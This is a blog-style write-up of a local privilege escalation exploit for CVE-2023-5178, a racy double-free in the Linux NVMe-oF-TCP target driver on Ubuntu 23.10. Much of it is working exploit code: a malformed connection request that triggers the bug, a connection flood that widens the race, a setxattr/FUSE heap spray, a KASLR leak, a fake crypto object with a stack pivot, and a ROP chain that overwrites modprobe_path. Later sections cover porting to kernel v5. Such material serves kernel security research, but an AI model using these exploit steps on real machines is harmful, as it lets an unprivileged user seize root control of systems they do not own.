CVE-2023-5178: exploiting Linux kernel NVMe-oF-TCP driver on Ubuntu 23.10
by rockrid3r
The NVMe-oF-TCP driver had a vulnerability found by Alon Zahavi. It leads to a racy double-free in kmalloc-96, which can be exploited to gain LPE.
The bug is a logic error in the handling of a corrupted Initialize Connection Request. Let's exploit it.
The bug
Communication in NVMe-oF-TCP happens via PDUs (Protocol Data Units). Every request to the server is a PDU, and every response from the server is a PDU. See the PDU structure at page 15 in the overview presentation.
The bug was in the function `nvmet_tcp_handle_icreq`, which handles the Initialize Connection Request.
If you provide an icreq (Initialize Connection Request) with an incorrect payload length (by specification, the length of every icreq is fixed and the same), you have made a "fatal error": your connection gets closed, and if you enabled PDU header/data digests (to ensure PDU/data integrity), the corresponding hashing objects get freed... twice:
static int nvmet_tcp_handle_icreq(struct nvmet_tcp_queue *queue)
{
struct nvme_tcp_icreq_pdu *icreq = &queue->pdu.icreq;
struct nvme_tcp_icresp_pdu *icresp = &queue->pdu.icresp;
struct msghdr msg = {};
struct kvec iov;
int ret;
if (le32_to_cpu(icreq->hdr.plen) != sizeof(struct nvme_tcp_icreq_pdu)) {
pr_err("bad nvme-tcp pdu length (%d)\n",
le32_to_cpu(icreq->hdr.plen));
nvmet_tcp_fatal_error(queue); // **schedules** a 2nd free
// does not return here
}
// ...
ret = kernel_sendmsg(queue->sock, &msg, &iov, 1, iov.iov_len); // err since socket is killed
if (ret < 0)
goto free_crypto;
// ...
free_crypto:
if (queue->hdr_digest || queue->data_digest)
nvmet_tcp_free_crypto(queue); // 1st free
}
`nvmet_tcp_fatal_error` kills the socket and schedules a queue release:
static void nvmet_tcp_fatal_error(struct nvmet_tcp_queue *queue)
{
queue->rcv_state = NVMET_TCP_RECV_ERR;
if (queue->nvme_sq.ctrl)
nvmet_ctrl_fatal_error(queue->nvme_sq.ctrl);
else // we go here
kernel_sock_shutdown(queue->sock, SHUT_RDWR); // triggers sk_state_change (see how below)
}
static void nvmet_tcp_state_change(struct sock *sk)
{
// ...
switch (sk->sk_state) {
// ...
case TCP_FIN_WAIT1: // we go here since the server closed connection
case TCP_CLOSE_WAIT:
case TCP_CLOSE:
/* FALLTHRU */
nvmet_tcp_schedule_release_queue(queue); // schedules the free on workqueue
break;
}
// ...
}
static void nvmet_tcp_schedule_release_queue(struct nvmet_tcp_queue *queue)
{
spin_lock(&queue->state_lock);
if (queue->state != NVMET_TCP_Q_DISCONNECTING) {
queue->state = NVMET_TCP_Q_DISCONNECTING;
queue_work(nvmet_wq, &queue->release_work);
}
spin_unlock(&queue->state_lock);
}
static void nvmet_tcp_release_queue_work(struct work_struct *w)
{
//...
if (queue->hdr_digest || queue->data_digest)
nvmet_tcp_free_crypto(queue);
//...
}
static void nvmet_tcp_free_crypto(struct nvmet_tcp_queue *queue)
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(queue->rcv_hash);
ahash_request_free(queue->rcv_hash);
ahash_request_free(queue->snd_hash);
crypto_free_ahash(tfm);
}
So the function `nvmet_tcp_free_crypto` is called from both:
- the "main thread", in `nvmet_tcp_handle_icreq` after the failed `kernel_sendmsg()`;
- the `nvmet_wq` worker, which was triggered in `nvmet_tcp_schedule_release_queue`.

Hence the double-free. Both `snd_hash` and `rcv_hash` come from the kmalloc-96 cache.
The double-free is racy, since we do not know how long it will take before the `nvmet_wq` worker starts doing its queue-release job.
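To summarize the trigger in code: a single malformed icreq on a fresh TCP connection walks the whole path. A minimal sketch, with the PDU layout mirrored from include/linux/nvme-tcp.h, the digest constants written out, and error handling omitted:

#include <stdint.h>
#include <string.h>
#include <sys/socket.h>

/* userspace mirror of the PDU structs from include/linux/nvme-tcp.h */
struct nvme_tcp_hdr {
    uint8_t  type;
    uint8_t  flags;
    uint8_t  hlen;
    uint8_t  pdo;
    uint32_t plen;                     /* little-endian on the wire */
};

struct nvme_tcp_icreq_pdu {
    struct nvme_tcp_hdr hdr;
    uint16_t pfv;
    uint8_t  hpda;
    uint8_t  digest;
    uint32_t maxr2t;
    uint8_t  rsvd2[112];
};

/* sock: an established TCP connection to the target (default port 4420) */
void send_bad_icreq(int sock)
{
    struct nvme_tcp_icreq_pdu icreq;

    memset(&icreq, 0, sizeof(icreq));
    icreq.hdr.type = 0x00;             /* nvme_tcp_icreq */
    icreq.hdr.hlen = sizeof(icreq);    /* 128: target reads the full PDU */
    icreq.hdr.plen = 0x1337;           /* wrong on purpose: must be sizeof(icreq) */
    icreq.pfv = 0;                     /* NVME_TCP_PFV_1_0 */
    icreq.digest = 0x3;                /* HDGST|DDGST: forces nvmet_tcp_alloc_crypto() */

    send(sock, &icreq, sizeof(icreq), 0);
}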
Exploitation
The trouble with dealing with a double-free
On systems with `CONFIG_SLAB_FREELIST_HARDENED`, you may consider yourself done for as soon as the double-free happens with no reallocation between the two calls:
+-----------------------+ +---------------------+ +--------------------+ +--------------------+
| | | | | | | |
| Object A | | Object B | | Object A | | Object C |
| | | | | | | |
| | | | | | | |
| freelist ^ random +-------> freelist ^ random +------>+ freelist ^ random +------>+ freelist ^ random +-----> ...
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
+-----------------------+ +---------------------+ +------------^-------+ +--------------------+
^ |
| |
| |
+------------------------+the same object (double-free)+-------+
When `CONFIG_SLAB_FREELIST_HARDENED` is enabled, the freelist pointer is not stored in plaintext. It is xor'ed with a random secret from the corresponding `kmem_cache` and with something else (which does not matter here). As soon as you allocate object A and overwrite its contents (in particular, the freelist pointer), the freelist becomes corrupted, and you can't do much about it since you don't know the random secret from the `kmem_cache`:
+---------------------+ +--------------------+ +------------------+
| | | | | |
| Object B | | Object A | | |
| | | | | |
| | | | | Unmapped region |
| freelist ^ random +------>+ written_data +------->+ |
| | | | | |
| | | !!!!!!!!!!!!!!!! | | |
| | | | | |
| | | | | |
+---------------------+ +--------------------+ +------------------+
If you then allocate 2 more objects, the kernel will crash.
So we need to reallocate the freed chunks before they are freed once more.
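For reference, this is roughly how SLUB encodes the stored pointer (slightly abridged from mm/slub.c; the "something else" above is the byte-swapped address of the slot the pointer is stored in):

static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
                                 unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
    /* per-cache secret xor'ed with the swab'ed storage address */
    return (void *)((unsigned long)ptr ^ s->random ^ swab(ptr_addr));
#else
    return ptr;
#endif
}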
Enlarging the race window
As we understand, the double-free is racy and the window between the 2 free calls is very tight. Reminder:
- the 1st free happens in the "main thread";
- the 2nd free is performed by the `nvmet_wq` worker whenever it gets around to it.

As we discussed above, we can't let the double-free happen without a reallocation in between: the system will crash.
The solution is simple: we need to keep the `nvmet_wq` worker busy.
Then we will have some time to reallocate the freed chunks before they are freed again.
Let's look at how the queue is created. There is a work loop, `nvmet_tcp_accept_work`, which `accept`s connections and creates a corresponding queue for each. The key point is that it creates a new queue for every TCP connection:
static void nvmet_tcp_accept_work(struct work_struct *w)
{
struct nvmet_tcp_port *port =
container_of(w, struct nvmet_tcp_port, accept_work);
struct socket *newsock;
int ret;
while (true) {
ret = kernel_accept(port->sock, &newsock, O_NONBLOCK); // here is accept()
if (ret < 0) {
if (ret != -EAGAIN)
pr_warn("failed to accept err=%d\n", ret);
return;
}
ret = nvmet_tcp_alloc_queue(port, newsock); // allocates queue!
if (ret) {
pr_err("failed to allocate queue\n");
sock_release(newsock);
}
}
}
static int nvmet_tcp_alloc_queue(struct nvmet_tcp_port *port,
struct socket *newsock)
{
struct nvmet_tcp_queue *queue;
int ret;
queue = kzalloc(sizeof(*queue), GFP_KERNEL);
if (!queue)
return -ENOMEM;
INIT_WORK(&queue->release_work, nvmet_tcp_release_queue_work); // exactly what is needed
// ...
ret = nvmet_tcp_set_queue_sock(queue); // sets up sk_state_change for socket.
// ...
}
static int nvmet_tcp_set_queue_sock(struct nvmet_tcp_queue *queue)
{
struct socket *sock = queue->sock;
// ...
if (sock->sk->sk_state != TCP_ESTABLISHED) {
/*
* If the socket is already closing, don't even start
* consuming it
*/
ret = -ENOTCONN;
} else {
// ...
queue->state_change = sock->sk->sk_state_change;
sock->sk->sk_state_change = nvmet_tcp_state_change;
// ...
}
write_unlock_bh(&sock->sk->sk_callback_lock);
return ret;
}
static void nvmet_tcp_state_change(struct sock *sk)
{
//...
switch (sk->sk_state) {
//...
case TCP_CLOSE_WAIT: // client closed connection
case TCP_CLOSE:
/* FALLTHRU */
nvmet_tcp_schedule_release_queue(queue); // schedules a worker job
break;
//...
}
//...
}
It means that if we create a TCP connection and then close it, the kernel schedules a worker job responsible for cleaning up the allocated queue.
So let's create a lot of such "dummy" connections, and then close all of them.
This populates the `nvmet_wq` workqueue with dummy jobs.
If we trigger the double-free now (by sending a malformed icreq), the kernel will not corrupt the freelist right away: the `nvmet_wq` worker has a lot of jobs to finish before it reaches the 2nd free. So we have some time to reallocate the freed chunks after the 1st free, and the same object never ends up twice in the same freelist.
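A sketch of the flood, assuming the target listens on 127.0.0.1:4420 (the default NVMe/TCP port); the connection count is a tunable guess, not a value taken from the original exploit:

#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

#define N_DUMMY 512                     /* more pending jobs => wider race window */

static int connect_target(void)
{
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port = htons(4420),
    };
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);
    if (fd < 0 || connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        return -1;
    return fd;
}

void flood_nvmet_wq(void)
{
    int fds[N_DUMMY];

    /* each accepted connection allocates a queue... */
    for (int i = 0; i < N_DUMMY; i++)
        fds[i] = connect_target();

    /* ...and each close() schedules a release_work job on nvmet_wq */
    for (int i = 0; i < N_DUMMY; i++)
        if (fds[i] >= 0)
            close(fds[i]);
}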
Reallocation strategy
Our target objects live in the `kmalloc-96` cache, so I've chosen the `setxattr + fuse` spray.
The idea is to reallocate the freed objects after the 1st free, and then reallocate them again after the 2nd. After this we will have a controllable use-after-free in kmalloc-96:
- `nvmet_tcp_alloc_crypto` allocates `snd_hash` and `rcv_hash`.
- 1st free of both `snd_hash` and `rcv_hash`.
- Reallocate the objects.
- 2nd free of both `snd_hash` and `rcv_hash`.
- Reallocate the objects.
We will mark every xattr with its index in the spray, like this: `*(uint64_t*)&xattr_i[0] = i`.
So all but 2 xattrs will have `*(uint64_t*)&xattr_i[0] == i`.
Those 2 xattrs (the ones which reallocated `snd_hash` and `rcv_hash` after the 1st free) will have `*(uint64_t*)&xattr_i[0] != i`. Moreover, the values written into them will correspond to the xattrs which reallocated `snd_hash` and `rcv_hash` after the 2nd free.
In the exploit, I call those values `tag[0]` and `tag[1]`.
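A minimal sketch of the tagging; in the real spray the value buffer additionally straddles a FUSE-backed page so that `copy_from_user()` blocks mid-copy and the kmalloc-96 allocation stays pinned (the file and xattr names here are illustrative):

#include <stdint.h>
#include <string.h>
#include <sys/xattr.h>

#define OBJ_SZ 96                       /* target cache: kmalloc-96 */

void spray_one(uint64_t i)
{
    uint8_t val[OBJ_SZ];

    memset(val, 'A', sizeof(val));
    *(uint64_t *)&val[0] = i;           /* tag: spray index at offset 0 */

    /* setxattr() copies the value into a fresh kmalloc-96 buffer;
     * in the exploit this call blocks on a FUSE page mid-copy,
     * pinning the allocation until we decide to release it */
    setxattr("/tmp/spray", "user.x", val, sizeof(val), 0);
}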
In order to check the value of `xattr_i`, we need to release it, which triggers the free of the underlying object. If the value written in `xattr_i` does not equal `i`, it means we found a corrupted object, and we need to reallocate it ASAP so that nobody else takes it.
Freeing `tag[0]` or `tag[1]` will trigger the UAF (and a content leak, see below) on whatever kmalloc-96 object they overlapped with.
Hijacking control flow
We are going to hijack control flow via the `crypto_tfm` object. Consider `struct ahash_request`:
struct ahash_request {
struct crypto_async_request base;
unsigned int nbytes;
struct scatterlist * src;
u8 * result;
void * priv;
void * __ctx[];
};
(dumped with pahole)
struct crypto_async_request {
struct list_head list;
crypto_completion_t complete;
void * data;
struct crypto_tfm * tfm; // target pointer
u32 flags;
};
In the function `nvmet_tcp_free_crypto`, the `rcv_hash.base.tfm` pointer is converted (via the `container_of` macro) into the `crypto_ahash` object, which comes from kmalloc-128:
struct crypto_tfm {
refcount_t refcnt;
u32 crt_flags;
int node;
void (*exit)(struct crypto_tfm *tfm);
struct crypto_alg *__crt_alg;
void *__crt_ctx[] CRYPTO_MINALIGN_ATTR;
// size: 32
};
struct crypto_ahash {
int (*init)(struct ahash_request *);
int (*update)(struct ahash_request *);
int (*final)(struct ahash_request *);
int (*finup)(struct ahash_request *);
int (*digest)(struct ahash_request *);
int (*export)(struct ahash_request *, void *);
int (*import)(struct ahash_request *, const void *);
int (*setkey)(struct crypto_ahash *, const u8 *, unsigned int);
unsigned int reqsize;
struct crypto_tfm base;
};
+--------------------+
| struct |
| crypto_ahash |
| |
| |
+-------------------------+ | |
| struct ahash_request | | |
| (rcv_hash) | | |
| | | |
| | | |
+-------------------------+ | |
| tfm +------>+--------------------+
+-------------------------+ | |
| | | |
| | | |
| | | |
| | | embedded |
| | | struct crypto_tfm |
+-------------------------+ | |
| |
| |
| |
| |
+--------------------+
Let's see how the free proceeds:
static void nvmet_tcp_free_crypto(struct nvmet_tcp_queue *queue)
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(queue->rcv_hash);
ahash_request_free(queue->rcv_hash);
ahash_request_free(queue->snd_hash);
crypto_free_ahash(tfm); // conversion happens here
}
After the conversion, the function `crypto_destroy_tfm` is called with args `mem = crypto_ahash`, `tfm = &crypto_ahash.base`:
void crypto_destroy_tfm(void *mem, struct crypto_tfm *tfm)
{
struct crypto_alg *alg;
if (IS_ERR_OR_NULL(mem))
return;
if (!refcount_dec_and_test(&tfm->refcnt))
return;
alg = tfm->__crt_alg;
if (!tfm->exit && alg->cra_exit)
alg->cra_exit(tfm);
crypto_exit_ops(tfm); // goes here
crypto_mod_put(alg);
kfree_sensitive(mem);
}
static void crypto_exit_ops(struct crypto_tfm *tfm)
{
const struct crypto_type *type = tfm->__crt_alg->cra_type;
if (type && tfm->exit)
tfm->exit(tfm); // here we go
}
Corrupting `tfm->exit` will let us hijack control flow.
We don't have direct access to the `tfm` object, but we can overwrite `rcv_hash` (the `struct ahash_request`).
So we will overwrite `rcv_hash.base.tfm` to point at an address we control, and then perform ROP.
Leaks
So we basically want 2 things:
- a pointer to a kmalloc-128 object, to store both our ROP chain and the fake `crypto_tfm`;
- a kernel text pointer, to bypass KASLR.
Bypassing KASLR
Bypassing KASLR was pretty straightforward. I've chosen `struct squashfs_page_actor` for the pointer leak:
struct squashfs_page_actor {
union {
void **buffer;
struct page **page;
};
void *pageaddr;
void *tmp_buffer;
void *(*squashfs_first_page)(struct squashfs_page_actor *);
void *(*squashfs_next_page)(struct squashfs_page_actor *);
void (*squashfs_finish_page)(struct squashfs_page_actor *);
struct page *last_page;
int pages;
int length;
int next_page;
int alloc_buffer;
int returned_pages;
pgoff_t next_index;
};
It resides in kmalloc-96 and has kernel text pointers in its `.squashfs_*_page` members. We probably could even corrupt it to hijack control flow, but I decided not to go there; I only leak kernel pointers from it and stay with the NVMe primitives instead.
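On Ubuntu this object is easy to spray: snap packages are mounted as squashfs images, so an uncached read of any file under /snap allocates (and frees) a page actor, leaving its kernel pointers in a kmalloc-96 slot. A sketch, with an illustrative path:

#include <fcntl.h>
#include <unistd.h>

void alloc_page_actor(void)
{
    char buf[4096];
    /* any squashfs-backed file works; snap mounts are convenient on Ubuntu */
    int fd = open("/snap/core22/current/etc/passwd", O_RDONLY);

    if (fd >= 0) {
        /* an uncached read of a data block goes through a freshly
         * allocated struct squashfs_page_actor in kmalloc-96 */
        pread(fd, buf, sizeof(buf), 0);
        close(fd);
    }
}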
Leaking kmalloc-128
As we recall, `rcv_hash.base.tfm` contains a pointer into a kmalloc-128 object (at offset 72). Leaking it gives us the needed heap leak.
Arbitrary free
The key here is again the `.tfm` member of `rcv_hash` (`snd_hash` won't work).
The `.tfm` is extracted from `rcv_hash`, the pointer is then converted to the base object holding it, the `struct crypto_ahash` (kmalloc-128), and this `struct crypto_ahash` is freed.
So corrupting the `.tfm` of `rcv_hash` results in an arbitrary free.
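In other words: overlay `rcv_hash` (via the xattr spray) so that its `.base.tfm` points 72 bytes into the object we want freed. A sketch, with offsets computed from the pahole dumps above:

#include <stdint.h>
#include <string.h>

/* ahash_request.base = {list(16), complete(8), data(8), tfm(8), ...},
 * so .base.tfm sits at offset 32 of the kmalloc-96 overlay */
#define RCV_HASH_TFM_OFF      32
#define CRYPTO_AHASH_BASE_OFF 72   /* offsetof(struct crypto_ahash, base) */

/* craft the 96-byte overlay so that crypto_free_ahash() computes
 * container_of(tfm, struct crypto_ahash, base) == target and frees it;
 * note crypto_destroy_tfm() also dereferences refcnt/exit/__crt_alg,
 * so in practice target is a real (or well-formed fake) crypto_ahash */
void craft_arb_free(uint8_t overlay[96], uint64_t target)
{
    memset(overlay, 0, 96);
    *(uint64_t *)(overlay + RCV_HASH_TFM_OFF) = target + CRYPTO_AHASH_BASE_OFF;
}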
Reusing tfm to store ROP reliably
Imagine we have 2 `rcv_hash` objects: `rcv_hash1` and `rcv_hash2`.
We learned that we can leak the `rcv_hash1.base.tfm` pointer (kmalloc-128).
Let's take the leaked `.tfm` pointer from `rcv_hash1` (call it `leaked_tfm`) and set `rcv_hash2.base.tfm = leaked_tfm`.
Closing the 1st connection then frees `leaked_tfm` and turns `rcv_hash2.base.tfm` into a dangling pointer.
Reallocating `leaked_tfm` with both a ROP chain and a corrupted `crypto_tfm` provides comfortable stack pivoting (see below).
+------------+
| |<------+
| ROP | |
| | | stack pivot
+------------+ |
| crypto_tfm |-------+
+------------+
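A sketch of that 128-byte replacement object, with the `crypto_tfm` fields placed at the offsets from the struct dumps above. The gadget address has to be rebased with the KASLR leak, and `.__crt_alg` only needs to point at readable kernel memory with a non-NULL `cra_type`, so that `crypto_exit_ops()` reaches the `tfm->exit(tfm)` call without faulting:

#include <stdint.h>
#include <string.h>

#define TFM_OFF 72   /* offsetof(struct crypto_ahash, base) */

/* crypto_tfm layout (v6): refcnt(4) crt_flags(4) node(4) pad(4)
 *                         exit(8 @ +16) __crt_alg(8 @ +24) */
void build_fake_ahash(uint8_t obj[128], const uint64_t rop[9],
                      uint64_t pivot_gadget, uint64_t readable_kaddr)
{
    memset(obj, 0, 128);

    /* ROP chain at the top: after `push r12 ... pop rsp`,
     * rsp lands at the start of this object (9 qwords of room) */
    memcpy(obj, rop, 9 * sizeof(uint64_t));

    /* fake embedded crypto_tfm */
    *(uint32_t *)(obj + TFM_OFF + 0)  = 1;              /* refcnt: dec_and_test fires */
    *(uint64_t *)(obj + TFM_OFF + 16) = pivot_gadget;   /* .exit, called by crypto_exit_ops() */
    *(uint64_t *)(obj + TFM_OFF + 24) = readable_kaddr; /* .__crt_alg, must not fault */
}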
ROP
The `r12` register contains a pointer to the top of the `crypto_ahash` object (which we control). The other registers did not contain anything useful.
Stack pivot
So `r12` holds the address of the top of the `crypto_ahash` object, which in turn holds the `crypto_tfm` at offset `+72`.
Placing the ropchain at the top of `crypto_ahash` makes the pivot straightforward with this gadget:
0xffffffff81c15e22 : push r12 ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; xor edx, edx ; xor esi, esi ; xor edi, edi ; jmp 0xffffffff8215ad10
It basically made my day. After executing it, `rsp` points to the top of `crypto_ahash`, and we have `72/8 = 9` qwords to perform the ROP.
ROP-chain
I've chosen to overwrite `modprobe_path` and then call `msleep(-1)`.
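A sketch of such a chain within the 9-qword budget. The gadget and symbol offsets are placeholders to be resolved from the target kernel and rebased with the KASLR leak; note the first slot is eaten by the pivot's `pop rbp`, and the chain assumes the gadget's trailing `jmp` behaves like a `ret` (a return thunk):

#include <stdint.h>

/* placeholder offsets: resolve from the target kernel image */
#define POP_RAX_RET      0x0 /* pop rax ; ret */
#define POP_RDI_RET      0x0 /* pop rdi ; ret */
#define MOV_PRDI_RAX_RET 0x0 /* mov qword ptr [rdi], rax ; ret */
#define MODPROBE_PATH    0x0
#define MSLEEP           0x0

void build_rop(uint64_t rop[9], uint64_t kbase)
{
    int i = 0;

    rop[i++] = 0;                            /* consumed by the pivot's pop rbp */
    rop[i++] = kbase + POP_RAX_RET;
    rop[i++] = 0x782f706d742f;               /* "/tmp/x\0" */
    rop[i++] = kbase + POP_RDI_RET;
    rop[i++] = kbase + MODPROBE_PATH;
    rop[i++] = kbase + MOV_PRDI_RAX_RET;     /* modprobe_path = "/tmp/x" */
    rop[i++] = kbase + POP_RDI_RET;
    rop[i++] = (uint64_t)-1;
    rop[i++] = kbase + MSLEEP;               /* msleep(-1): park this worker forever */
}

Executing a file with an unknown binary format then makes the kernel run /tmp/x as root, the usual `modprobe_path` finisher.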
See full exploit code here.
Backporting to Linux Kernel v5.
Let’s discuss exploitation of the bug in Linux Kernel v5.
As we can see, in v5 the `struct crypto_tfm` does not yet have the `refcnt` member:
struct crypto_tfm {
u32 crt_flags;
int node;
void (*exit)(struct crypto_tfm *tfm);
struct crypto_alg *__crt_alg;
void *__crt_ctx[] CRYPTO_MINALIGN_ATTR;
};
The `crypto_tfm` is part of the `crypto_ahash` object, located at its footer.
In kernel v6 the total size of `crypto_ahash` is 104 bytes (because of the `refcnt` member of the `crypto_tfm` structure), so the object is moved into kmalloc-128. (A simple exercise for the reader to check.)
But in v5, the `crypto_tfm` does not have the `refcnt` member, so the `crypto_ahash` object is stored in kmalloc-96.
It means that the `.tfm` pointer in `rcv_hash` now points into a kmalloc-96 object.
Moreover, it is allocated every time `rcv_hash` is allocated (in `nvmet_tcp_alloc_crypto`) and freed every time `rcv_hash` is freed (in `nvmet_tcp_free_crypto`).
So now we have a double-free on a triplet of objects: `snd_hash`, `rcv_hash`, and `rcv_hash.tfm`!
It means that by using the same `fuse + setxattr` spray we now own the contents of `rcv_hash.tfm`, which is a huge advantage for exploitation. In v6, in order to hijack control flow, we had to redirect the `.tfm` pointer in `rcv_hash` to a known location, because we were not in control of its contents; now we don't have to, AND we control its contents.
Happy pwning!